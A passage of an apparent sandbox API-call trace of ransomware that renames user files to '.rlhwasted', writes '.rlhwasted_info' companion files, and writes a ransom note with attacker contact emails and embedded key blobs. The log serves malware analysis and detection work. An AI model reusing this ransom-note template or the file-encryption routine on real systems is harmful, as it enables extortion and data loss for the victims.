[0196.778] SetEndOfFile (hFile=0x124) returned 1 [0196.780] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.780] CloseHandle (hObject=0x124) returned 1 [0196.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9ae8 | out: hHeap=0x6b0000) returned 1 [0196.831] _aulldvrm () returned 0x0 [0196.831] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0196.831] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.831] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0196.831] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x296) returned 0x6d4580 [0196.832] lstrcpyW (in: lpString1=0x6d460c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.832] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.832] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0196.832] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.832] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.833] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.834] SetEndOfFile (hFile=0x124) returned 1 [0196.834] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.834] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.834] lstrcpyW (in: lpString1=0x6d460c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.rlhwasted")) returned 1 [0196.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0196.852] GetLastError () returned 0x5 [0196.852] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.rlhwasted")) returned 0x23 [0196.852] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted", dwFileAttributes=0x22) returned 1 [0196.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.852] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0196.852] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xf8 [0196.852] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0xb00000 [0196.853] CloseHandle (hObject=0x12c) returned 1 [0196.855] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.855] CloseHandle (hObject=0x10c) returned 1 [0196.855] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.rlhwasted", dwFileAttributes=0x23) returned 1 [0196.855] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.855] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0196.856] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.856] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.856] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.857] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.857] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.866] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.866] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mBw8sIbIoPpKDokZknd8XZwcVDwAHTl/Uydcs7JS9ImxodvAX4OAvEEFx+Z3eXH7\r\novjIWn3Uv44svBEncqQSk9LH3MmvNt7UWUHyWyPzFdwplyDhO9UofI7FywUy8YkV\r\nPAWh9H/LvmLMGU3x3HKY3uFuLH/7TQnDheR9K7IMuPymM4CUVWGJZmjyNfPqBPHB\r\nm2xxYvCtRe5XXEc3c7Z1MUHnjlY2Tp1dCfoiXXJUg7l6+G1D+Jh+FTTfaVXzCafl\r\nSD5sPgQYaZf+Hwfp7EeXG2aTMso/IKBfBOsF21QqYIQfgpenZOw8c/SR2BKVTJ0A\r\nUtJVGHj2DN5Gge+1bhF+mQkUuiwbq2w8vUo6vmhc/62/oGS7qHeKUcq7pQrtOekR\r\n2S/U70soO5UekBA3CgokjSSJ+nt6Wxfet2PKW1NVeyAUeb+NBA4trWFokQuF664u\r\nkhHaCX3OyIPJ0apy1gyRNUxeyIBzZIKG4ELWVP6oYqYN8wqqPgHl+mOfpeM1O7P1\r\nXrAExRYG8rV79l6FAJkYKX5uszeHrNP7iKzxs+UqWie+tNFDLQyRIQpA0sAwNcEG\r\nrRiaDVd1X1TGiDBBs3wGdfuDbC19dNBwIIp+dM2ZhxqeJ1vnbjsZEm9BGKmqPIZz\r\nUICHoowtw40JN17pG1K286ahUw+Iy8JKmbC76z+Hij6=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.866] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.866] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.866] SetEndOfFile (hFile=0x124) returned 1 [0196.868] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.868] CloseHandle (hObject=0x124) returned 1 [0196.871] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.871] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b388 | out: hHeap=0x6b0000) returned 1 [0196.872] _aulldvrm () returned 0x0 [0196.872] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.872] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.872] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\eCr7IZOcmAN94aLfOkt.swf") returned 84 [0196.873] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6d4580 [0196.873] lstrcpyW (in: lpString1=0x6d4628, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.873] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.873] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.873] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.873] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\eCr7IZOcmAN94aLfOkt.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\ecr7izocman94alfokt.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.975] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.976] SetEndOfFile (hFile=0x108) returned 1 [0196.976] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.976] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.977] lstrcpyW (in: lpString1=0x6d4628, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\eCr7IZOcmAN94aLfOkt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\ecr7izocman94alfokt.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\eCr7IZOcmAN94aLfOkt.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\ecr7izocman94alfokt.swf.rlhwasted")) returned 1 [0196.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\eCr7IZOcmAN94aLfOkt.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\ecr7izocman94alfokt.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.978] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0196.978] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x701 [0196.978] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x701) returned 0x6a0000 [0196.978] CloseHandle (hObject=0x128) returned 1 [0196.980] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.980] CloseHandle (hObject=0x124) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8978 [0196.980] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0196.981] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0196.981] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.981] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0196.982] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.982] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.991] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0196.991] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.991] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.991] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l5fXzQ4PPHNI7C50uYZ8ZFwLBOveFF1RHTnCTXmsFI6d6w12OR8FeDNk67EMQ1ja\r\njL9d+TwHXZlUhvs94MmenvQrCCy3VFr/1DvJzoOCfcuSCIS26WMgojJ94WtgYQvD\r\nGn7m158Cg7I37PNulRh0qIB29b0Ox+3UjGbrQ6dQJh+FvYgeYqhHiMXLdejlCjG6\r\n3vahf3fSmh5nG7vlSq/+2Xh0mlRkp/S1dsRQBZZCR2C5pRo58S3kaFcZ1Ehdrcvn\r\nDAvAZQIL/Ld4uIj2QSqVI5+tk6TCOir1Agu7+CTowq7qXE4ijRElIXvrsnAKTdwB\r\n9WJGkM/YD26lZ3s5laZkQElZYNftUPF1nYdS6Yz1Gh8pCKIZ3zw5ieN++1TKVxhl\r\nn0dhoUqgH5NGuPk0FoKcaqO7Tdws1k3bEnDqt8uhVMAv+6G3x+Y3TJifV/yV5WAt\r\nBoYdUdkal1h1jjhw3qs1QL1Pgy5+4E+Bngz1OK70t04znLkeL94JTKbrYnTGii4+\r\n2H/3LltZkfDykaiUXNDIVJGuo7XrjqsnsFCA9kKn+oc35QtKfktbca1tJydnGlIA\r\nb9C1BA/BEUxm1oildeeHwAxeq4Re4dn5WTfk081qcPcJxJlXHq1rWuIjHOcsbZ4q\r\nP3X5i5VyhMEymGRaqUHBAiF0Cqx4xjvKJDufLUM1AL4=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.991] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0196.991] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.991] SetEndOfFile (hFile=0x108) returned 1 [0196.994] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.994] CloseHandle (hObject=0x108) returned 1 [0197.000] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.000] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed930 | out: hHeap=0x6b0000) returned 1 [0197.000] _aulldvrm () returned 0x0 [0197.000] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.001] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.001] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qePW2.flv") returned 50 [0197.001] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26e) returned 0x6d4580 [0197.002] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.002] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.002] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.003] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.003] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qePW2.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qepw2.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.003] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.004] SetEndOfFile (hFile=0x108) returned 1 [0197.005] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.005] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.005] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qePW2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qepw2.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qePW2.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qepw2.flv.rlhwasted")) returned 1 [0197.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qePW2.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qepw2.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.006] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.006] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xd95a [0197.006] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd95a) returned 0x6a0000 [0197.006] CloseHandle (hObject=0x124) returned 1 [0197.056] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.057] CloseHandle (hObject=0x128) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8978 [0197.057] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.058] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0197.058] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.058] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.058] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.058] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.068] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.068] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.068] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.068] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HCR1PHG29HwX3Bz3NFI18GK3NAkChiKa4bANdGGtqO7OJNtMQquFMUPTXHXEpmn4\r\n00GzUqQju3F374fywZOs6U5ayDSja2b0Vsru32JeEp9/FxaJmWCoq6MOPTg5uQEB\r\n+oIGC3S48U2MAnkMjgt+FBxPOoyeJ30ANidgZlgcGqLWWrvDdwBKCS5M3KkQ5e69\r\nJgzO7fES7IlYa+qTdH3YEIqj/R7ihEQEJds3MRSGqJJ/4FVRToj7wOFdR/05prCK\r\nnJNC2CVN6eQv+EMjgGnXKN86m2VGvLMAAY1HWf0YTwIAgFWCwq7A8PH5QURjZH86\r\nDVxMWiLHzeP38s7JM93BfDkGv2F58AzgqoVTdJ+vRBGJXCkDC32ai2wLVhuG4j72\r\nMWWSX1wXbIrXfg1aj3m4IqzmBJSFLUvy2HS4uVwSnPR+2MKbKNcS1cPvxGpO3FzN\r\nGqnH0E3rwqAbRsZYKgAeRsHCIrVuqj9GZnIED660U7mrP/lJ48kvuGQMk9XUU2xb\r\n1XTXyVYhYpGzDtxR+TSaVD2WXgQXYVJ+YL/o0QxFo5wLmb2yE/dtE+Gs6beIBD6U\r\nvdAGTUp0FD14dD6qQhSdacAWxZhaS0Zm/dtag235o6/j5T8q+7ICJ3apkwVYZxtE\r\nADvOTCcK3+8n1qDIgoINq1kaSmFbZBUiRfq8ohLUP73=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.068] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.068] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.068] SetEndOfFile (hFile=0x108) returned 1 [0197.070] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.070] CloseHandle (hObject=0x108) returned 1 [0197.072] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.072] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708130 | out: hHeap=0x6b0000) returned 1 [0197.072] _aulldvrm () returned 0x0 [0197.072] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.073] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.073] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 